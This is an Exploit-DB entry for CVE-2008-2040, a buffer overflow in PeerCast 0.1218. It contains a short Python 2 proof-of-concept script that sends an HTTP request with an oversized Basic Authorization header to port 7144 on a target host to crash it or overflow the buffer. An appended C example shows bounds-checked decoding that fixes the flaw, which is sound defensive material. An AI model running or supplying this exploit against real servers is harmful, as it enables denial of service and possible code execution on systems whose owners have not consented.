- 18 Dec 2022
- EDB-ID
- 31713
- EDB verified
- Passed
- Author
- NICO GOLDE
- Vulnerability type
- DOS
- Platform
- LINUX
- CVE
- cve-2008-2040
- Publication date
- 2008-04-29
Code:
source: https://www.securityfocus.com/bid/28986/info
PeerCast is prone to multiple buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer.
Successfully exploiting these issues will allow an attacker to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will likely crash the application.
These issues affect PeerCast 0.1218; other versions may also be affected.
#!/usr/bin/env python
# Python 2 proof of concept (print statements, str sent directly on the socket).
import sys, socket

port = 7144

# HTTP request whose Basic credential is a very long base64 string.
buff = 'GET /http/ HTTP/1.1\n'
buff+= 'Connection: close\n'
buff+= 'Accept: */*\n'
buff+= 'Authorization: Basic OmZ' + 'vb29'*128 + 'vbwo=' + '\r\n'

if(len(sys.argv) < 2):
    print "ERR: please specify a hostname"
    sys.exit(-1)

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((sys.argv[1], port))
    s.send(buff)
except:
    print "ERR: socket()"
    sys.exit(-1)
- Source
- www.exploit-db.com
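
The missing bounds check described in the advisory, shown from the fixing side: an added example (not PeerCast's code and not part of the original entry) of decoding a Basic credential into fixed-size buffers while rejecting input that would not fit. The function names and the 128-byte credential limit are assumptions made for illustration.

```c
#include <string.h>

/* Map one base64 character to its 6-bit value, or -1 if it is not base64. */
static int b64_val(unsigned char c) {
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    return c == '+' ? 62 : c == '/' ? 63 : -1;
}

/* Decode base64 into out[cap], stopping at padding or end of line. Returns
 * the decoded length, or -1 when the input is malformed or the result plus
 * its terminating NUL would not fit in out. */
static long b64_decode_bounded(const char *in, char *out, size_t cap) {
    size_t n = 0;
    unsigned acc = 0;
    int bits = 0;
    if (cap == 0) return -1;
    for (; *in && *in != '=' && *in != '\r' && *in != '\n'; in++) {
        int v = b64_val((unsigned char)*in);
        if (v < 0) return -1;
        acc = (acc << 6) | (unsigned)v;
        if ((bits += 6) >= 8) {
            bits -= 8;
            if (n + 1 >= cap) return -1;  /* reject, never write past out */
            out[n++] = (char)((acc >> bits) & 0xFF);
        }
    }
    out[n] = '\0';
    return (long)n;
}

/* Split an Authorization value of the form "Basic <base64>" into user and
 * password. Returns 0 on success, -1 when the request must be rejected. */
int parse_basic_auth(const char *value, char *user, size_t ucap,
                     char *pass, size_t pcap) {
    char cred[128];  /* assumed limit for this example */
    char *colon;
    if (strncmp(value, "Basic ", 6) != 0) return -1;
    if (b64_decode_bounded(value + 6, cred, sizeof cred) < 0) return -1;
    if ((colon = strchr(cred, ':')) == NULL) return -1;
    *colon++ = '\0';
    if (strlen(cred) >= ucap || strlen(colon) >= pcap) return -1;
    strcpy(user, cred);
    strcpy(pass, colon);
    return 0;
}
```

A caller that gets -1 should answer with an authentication failure and close the connection rather than continue with partially filled buffers.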